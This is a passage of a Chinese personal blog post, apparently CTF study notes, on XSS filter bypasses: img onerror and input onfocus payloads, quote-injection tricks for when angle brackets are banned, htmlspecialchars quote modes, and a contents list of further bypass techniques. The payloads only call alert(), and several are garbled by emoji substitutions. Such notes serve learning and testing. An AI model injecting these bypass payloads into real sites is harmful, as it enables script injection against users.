</code></pre></div><p>所以在这里只要是双标签都不能使用，同时由于&amp;nbsp替换了空格（在属性中不能被解析，返回空），所以</p> <p>只能将空格处换为%0a（换行）</p> <p>单标签：img</p> <p>😄<img rc="" onerror="javascript:alert('王登登的博客')"></p> <p>在图片出现错误时，执行onerror的js函数</p> <p>单标签：input</p> <p>&lt;input type=&quot;submit&quot; onfocus=&quot;😄java:alert('wangjingze')&quot;;&gt;</p> <p><strong>注意：</strong></p> <p>onfocus以及onerror的值形式;</p> <p>=</p> <ol><li>​	”     前面随便写:alert(1)	“,所以即使加了script也会执行</li> <li>&quot;	😄alert(1)	&quot;</li> <li>😄alert(1)</li></ol> <h1 id="三、对于所有的xss类型做出总结-方便直接做题"><a href="#三、对于所有的xss类型做出总结-方便直接做题" class="header-anchor">#</a> 三、对于所有的xss类型做出总结，方便直接做题</h1> <h2 id="_1-被ban"><a href="#_1-被ban" class="header-anchor">#</a> 1.&lt;&gt;被ban</h2> <p>(('onfocus=javascript:alert('90')</p> <p>' onclick=javascript:alert(/88/) //针对单双引号不被使用，但是要求回显字符串。))</p> <p>htmlspecialchars() 可用的引号类型：</p> <ul><li>ENT_COMPAT - <strong>==默认。仅编码双引号==</strong>。</li></ul> <h2 id="_2-on以及含有-script的过滤"><a href="#_2-on以及含有-script的过滤" class="header-anchor">#</a> 2.on以及含有&lt;script的过滤</h2> <p>闭合前标签</p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token operator">&lt;</span>a <span class="token punctuation">:</span>smile<span class="token punctuation">:</span> hrf<span class="token operator">=</span>javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'wdd'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">&gt;</span>alert <span class="token operator">&lt;</span><span class="token operator">/</span>a<span class="token operator">&gt;</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
</code></pre></div></div></article> <div class="main-div vssue"><!----></div></div></main> <aside class="aside" data-v-b3fda33c data-v-b3fda33c><div class="info-card main-div" data-v-1311ce9e data-v-b3fda33c><div class="info-card-header" style="background-size:cover;background-repeat:no-repeat;background-position:center;background-attachment:scroll;background-image:url(/wangdengdeng/avatar-bg.jpeg);" data-v-1311ce9e><img src="/wangdengdeng/avatar-top.jpeg" alt="WangDengdeng" class="info-avatar" data-v-1311ce9e></div> <div class="info-card-body" data-v-1311ce9e><section class="info-name" data-v-1311ce9e>
      WangDengdeng
    </section> <section class="info-desc" data-v-1311ce9e>I am a slow walker, but I never walk backwards.<br/>道阻且长,行则将至</section> <section class="info-contact" data-v-1311ce9e><section data-v-1311ce9e><span data-v-1311ce9e data-v-1311ce9e><svg class="icon" style="font-size:1em;" data-v-1311ce9e data-v-1311ce9e><use xlink:href="#icon-location" data-v-1311ce9e data-v-1311ce9e></use></svg><span class="info-text" data-v-1311ce9e data-v-1311ce9e>
          China
        </span></span></section> <!----> <section data-v-1311ce9e><span data-v-1311ce9e data-v-1311ce9e><svg class="icon" style="font-size:1em;" data-v-1311ce9e data-v-1311ce9e><use xlink:href="#icon-email" data-v-1311ce9e data-v-1311ce9e></use></svg><span class="info-text" data-v-1311ce9e data-v-1311ce9e>
          jimmybutler19@163.com
        </span></span></section></section></div> <div class="info-card-footer" data-v-1311ce9e><p class="footer-sns-link" data-v-1311ce9e></p></div></div> <div class="post-toc main-div aside-toc" style="position:relative;top:0;width:0px;" data-v-b3fda33c><h4>- CATALOG</h4> <div class="post-nav-toc"><ul><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#反射型">反射型:</a><ul><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_1-直接接受表单传输的值-拼接在html代码中执行">1.直接接受表单传输的值，拼接在html代码中执行</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_2-一个函数htmlspecialchars">2.一个函数	htmlspecialchars()</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_3-深入一个函数htmlspecialchars-的传参">3.深入一个函数htmlspecialchars()的传参：</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_4-黑名单o-n-scr-ipt绕过">4.黑名单on	&lt;script绕过</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_5-大小写绕过">5.大小写绕过</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_6-双写绕过">6.双写绕过</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_7-源码">7.源码：</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_8-源码">8.源码：</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_9-input的新属性">9.input的新属性</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_10-referer">10.referer:</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_11-ua没的说">11.UA没的说</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_12-cookie的构成">12.Cookie的构成</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_13-图片exif构造xss">13.图片exif构造xss</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_14-文件包含">14.文件包含</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_15-被过滤">15./被过滤</a></li></ul></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_1-被ban">1.被ban</a></li><li><a href="/wangdengdeng/posts/2021/04/21/web%E5%AE%89%E5%85%A8%E4%B9%8Bxss.html#_2-on以及含有-script的过滤">2.on以及含有&lt;script的过滤</a></li></ul></div></div></aside></div> <footer class="footer" data-v-7f2e4136><p class="footer-sns-link"></p> <div class="copyright"><span id="custom">Copyright &copy; WADE_2ng 2020 <br /> 
        Theme By <a href="https://www.vuepress.cn/" target="_blank">VuePress</a></span> <!----></div></footer></div><div class="global-ui"><!----><!----></div></div>
    <script src="/wangdengdeng/assets/js/app.f1f99d8b.js" defer></script><script src="/wangdengdeng/assets/js/6.e2e47644.js" defer></script><script src="/wangdengdeng/assets/js/14.593cb0fe.js" defer></script>
  </body>
</html>
